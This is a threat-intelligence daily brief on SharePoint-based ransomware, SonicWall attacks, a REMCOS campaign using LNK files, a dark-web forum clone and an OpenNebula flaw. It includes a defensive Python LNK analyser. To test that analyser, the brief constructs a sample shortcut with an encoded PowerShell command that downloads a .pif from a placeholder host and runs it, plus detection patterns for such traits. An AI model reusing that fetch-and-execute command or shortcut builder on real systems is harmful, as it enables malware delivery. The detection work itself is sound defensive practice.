ZeroFox Daily Intelligence Brief - August 4, 2025
by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Threat Actor Deploys Custom Infrastructure in Ransomware Attacks
- SonicWall Firewall Targeted in Ongoing Ransomware Attacks
- New Malware Campaign Exploits Shortcut Files to Hijack Systems
Threat Actor Deploys Custom Infrastructure in Ransomware Attacks
Source: https://thehackernews.com/2025/08/storm-2603-exploits-sharepoint-flaws-to.html
What we know: Storm-2603, a suspected China-based threat actor, has exploited the Microsoft SharePoint vulnerabilities CVE-2025-49706 and CVE-2025-49704 to deploy the Warlock ransomware strain, using a custom command-and-control (C2) framework, AK47 C2.
Context: The actor, active since March 2025, has targeted organizations in Latin America and Asia Pacific, deploying two ransomware payloads, Warlock and LockBit Black, alongside DNS-based backdoors and open-source tools.
Analyst note: The use of multiple ransomware strains could be intended to complicate incident response, obscure attribution, and evade signature-based detection. Given the suspected China link, the actor is also likely collecting and exfiltrating sensitive corporate information in support of its home country's geopolitical agenda.
SonicWall Firewall Targeted in Ongoing Ransomware Attacks
What we know: The Akira ransomware group is suspected of exploiting a zero-day vulnerability in SonicWall firewall devices, following a rise in attacks on those devices since July 2025.
Context: Multiple ransomware intrusions have reportedly begun with unauthorized access through SonicWall SSL VPN connections. However, researchers have not ruled out credential-based attacks as the initial access vector.
Analyst note: If a zero-day is indeed being exploited in the wild, entities running SonicWall firewalls are likely at risk of a wider network compromise, with internal resources such as sensitive documents and applications exposed to theft or encryption. Until the root cause is confirmed, defenders should treat credential abuse and a zero-day as equally live: limit SSL VPN exposure, enforce multi-factor authentication, and review VPN authentication logs for logins from unexpected sources.
New Malware Campaign Exploits Shortcut Files to Hijack Systems
Source: https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/
What we know: A deceptive malware campaign has been identified that uses malicious Windows shortcut ([.]LNK) files to deliver the REMCOS remote-access trojan.
Context: The campaign begins with a shortcut file posing as a purchase order. The chain relies on Base64 encoding and a disguised [.]PIF file (an executable format that Windows still runs) to install REMCOS while evading detection by security tools.
Analyst note: REMCOS gives attackers full remote access, including keylogging, file theft, and webcam and microphone surveillance, which is likely to lead to credential theft, espionage, or lateral movement within corporate networks. Left unchecked, it could also serve as a foothold for ransomware, corporate sabotage, or large-scale data breaches.
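Because the chain hinges on what the shortcut actually executes, the check a responder wants is to pull the target and argument strings out of the [.]LNK and decode any Base64 in them. The Python below is an added example for that, not code from the article or from the report it cites: a minimal parser for the Shell Link header and StringData fields, a decoder for PowerShell -EncodedCommand payloads (UTF-16LE under the Base64), and a few heuristics for the traits named above (script-interpreter target, encoded command, hidden window, [.]PIF reference). The sample shortcut and its command line are constructed here for illustration; example.invalid, the file names and the indicator labels are placeholders, not indicators from the campaign.

```python
"""Parse a Windows .LNK (Shell Link) and flag the traits of the LNK -> Base64 -> .pif chain above.
Added example, not code from the article or the report it cites; the sample shortcut is constructed
in memory and its command line is a stand-in for the campaign's real payload."""
import base64
import re
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046} on disk
# LinkFlags bits (MS-SHLLINK 2.1.1) deciding which optional sections follow the 76-byte header
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = (1 << i for i in range(8))
# StringData sections appear in this fixed order, each present only if its flag is set
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))

INTERPRETERS = re.compile(r"(?i)\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)\.exe\b")
ENCODED_SWITCH = re.compile(r"(?i)-e(c|n|nc|ncodedcommand)?\b")  # prefixes PowerShell accepts for -EncodedCommand
HIDDEN_WINDOW = re.compile(r"(?i)-w(indowstyle)?\s+hidden")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def build_lnk(id_list=b"", **strings):
    """Build a minimal Unicode .LNK: header, optional IDList, then StringData."""
    flags, body = IS_UNICODE, b""
    if id_list:
        flags |= HAS_IDLIST
        body += struct.pack("<H", len(id_list)) + id_list
    for flag, key in STRING_FIELDS:
        if strings.get(key) is not None:
            flags |= flag
            body += struct.pack("<H", len(strings[key])) + strings[key].encode("utf-16-le")
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    return header.ljust(HEADER_SIZE, b"\x00") + body  # remaining header fields zeroed

def parse_lnk(data):
    """Return the StringData fields of a .LNK as a dict, skipping IDList and LinkInfo by their sizes."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_IDLIST:  # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, key in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, not bytes
            raw = data[pos + 2:pos + 2 + (count * 2 if unicode else count)]
            pos += 2 + len(raw)
            fields[key] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return fields

def decode_base64_runs(text):
    """Decode long Base64 runs; PowerShell -EncodedCommand payloads are UTF-16LE."""
    decoded = []
    for match in B64_RUN.finditer(text):
        try:
            blob = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error subclasses ValueError
            continue
        try:
            decoded.append(blob.decode("utf-16-le"))
        except UnicodeDecodeError:
            decoded.append(blob.decode("latin-1"))
    return decoded

def analyze_lnk(data):
    """Score a .LNK against the traits of the shortcut -> Base64 -> .pif chain."""
    fields = parse_lnk(data)
    target, args = fields.get("relative_path", ""), fields.get("arguments", "")
    decoded = decode_base64_runs(args)
    indicators = []
    if INTERPRETERS.search(target + " " + args):
        indicators.append("script-interpreter-target")
    if ENCODED_SWITCH.search(args) or "FromBase64String" in args:
        indicators.append("base64-encoded-command")
    if HIDDEN_WINDOW.search(args):
        indicators.append("hidden-window")
    if re.search(r"(?i)\.pif\b", " ".join([target, args] + decoded)):  # the decoded command counts too
        indicators.append("pif-executable")
    return {"fields": fields, "decoded_commands": decoded, "indicators": indicators,
            "verdict": "suspicious" if len(indicators) >= 2 else "benign"}

# Constructed sample: decoy document name, PowerShell target, hidden window, Base64 -EncodedCommand
# that fetches and runs a .pif. example.invalid is a placeholder host, not a campaign indicator.
SAMPLE_COMMAND = ("Invoke-WebRequest -Uri http://example.invalid/po.pif -OutFile $env:TEMP\\po.pif; "
                  "Start-Process $env:TEMP\\po.pif")
SAMPLE_ARGS = ("-NoProfile -WindowStyle Hidden -EncodedCommand "
               + base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii"))
SAMPLE_LNK = build_lnk(name="Purchase Order 4471.pdf", arguments=SAMPLE_ARGS,
                       relative_path="..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                       icon_location="%SystemRoot%\\System32\\shell32.dll")
BENIGN_LNK = build_lnk(name="Notepad", relative_path="..\\..\\Windows\\notepad.exe", arguments="")  # constructed

if __name__ == "__main__":
    report = analyze_lnk(SAMPLE_LNK)
    print(report["verdict"], report["indicators"])
    print("decoded:", *report["decoded_commands"])
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo ahead of the strings; the parser skips both by their declared sizes, and ignores the ExtraData blocks that follow the strings. To triage a file from a mailbox or quarantine, call analyze_lnk on its bytes and read the decoded command before anything else: the Base64 is what hides the [.]PIF download from a naive string scan.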
DEEP AND DARK WEB INTELLIGENCE
XSS's alleged new domain emerges: At least one new domain claiming to be operated by an XSS admin, xss[.]pro, has emerged on the dark web following the recent law enforcement takedown. "Admin" claimed that multiple security issues present in the original XSS domain have been addressed in xss[.]pro, and that another site, named DamageLib, was spreading lies that XSS is a honeypot. Several clone domains of XSS are very likely to emerge in the coming weeks, each claiming to be operated by the original XSS admins; some are likely to be listed for sale, though their legitimacy cannot be verified.
VULNERABILITY AND EXPLOIT INTELLIGENCE
CVE-2025-54955: This OpenNebula vulnerability enables an unauthenticated attacker to exploit a timing issue and obtain a valid JSON Web Token (JWT) belonging to a legitimate user without knowing that user's credentials. With a valid JWT, the attacker can impersonate the user, gain unauthorized access to the system, and potentially take full control of the account, likely leading to data breaches, privilege escalation, and wider compromise of the cloud resources OpenNebula manages.
Affected products: OpenNebula Community Edition (CE) versions before 7.0.0 and Enterprise Edition (EE) versions before 6.10.3
Tags: DIB, tlp:green